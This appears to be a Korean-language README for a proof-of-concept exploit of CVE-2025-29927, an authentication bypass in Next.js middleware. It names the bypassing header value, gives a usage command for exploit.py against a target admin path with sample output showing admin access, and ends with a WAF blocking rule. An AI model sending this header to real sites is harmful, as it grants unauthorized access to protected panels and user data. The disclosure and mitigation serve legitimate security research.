
여기에 CVE-2025-29927에 대한 간단하지만 효과적인 익스플로잇이 있습니다.
이 저장소는 CVE-2025-29927에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이는 Next.js의 치명적인 취약점으로, 공격자가 미들웨어 특정 HTTP 헤더를 악용하여 인증 검사를 우회할 수 있게 합니다.
Next.js 애플리케이션은 종종 인증 및 접근 제어를 위해 미들웨어에 의존합니다. 이 CVE는 x-middleware-subrequest 헤더가 처리되는 방식의 논리적 결함에서 발생합니다. 이 헤더가 middleware로 설정되면 서버가 요청이 내부 로직에서 발생했다고 잘못 가정하여 미들웨어 기반 인증을 우회할 수 있습니다.
이를 통해 공격자는 자격 증명이나 유효한 세션 없이 관리자 패널, 보호된 API 또는 사용자 데이터에 접근할 수 있습니다.
Next.js 애플리케이션이 취약한지 테스트할 수 있는 간단한 Python 스크립트를 제공합니다.
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
x-middleware-subrequest를 신뢰 신호로 사용하지 마세요.WAF 로직:
if header 'x-middleware-subrequest' == 'middleware':
block_request()
이 PoC는 지속적인 취약점 연구 활동의 일환으로 W2H Corp.의 Offensive Security Team에 의해 개발되었습니다. CVE 설명에 대한 원본 게시글은 여기에서 확인할 수 있습니다.